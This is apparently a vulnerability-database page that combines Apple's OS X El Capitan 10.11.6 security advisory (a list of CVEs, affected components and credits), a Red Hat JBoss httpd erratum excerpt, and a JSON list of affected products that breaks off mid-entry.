FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y +cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy pSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV xj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u wevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN ZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k ah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk mmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC JM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc 55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs xPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5 YozOGPQFmX0OviWCQsX6 =ng+m -----END PGP SIGNATURE----- . Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0079", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 1.9, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.9, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.9, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux)" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "ip38x/3000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "6.2" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ip38x/3500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ip38x/fw120", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "ip38x/1200", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver6.1 to v8.0" }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "netvisorpro 6.1" }, { "model": "ip38x/810", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.3" }, { "model": "ip38x/n500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "ip38x/1210", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1t" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "business connect v7.1.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 and later" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "ip38x/5000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "7.0" }, { "model": "ip38x/sr100", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "11.5.1" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "1000v" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "spa51x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "network health framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2.1" }, { "model": "unified series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "780011.5.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.6(3)" }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "emergency responder", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.53" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.6.0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "nexus series blade switches 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "telepresence isdn link", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "mediasense 9.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.119" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "aspera shares", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.9.6" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "10.1-release-p26", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.8" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "prime collaboration assurance sp1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "tivoli netcool system service monitors fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 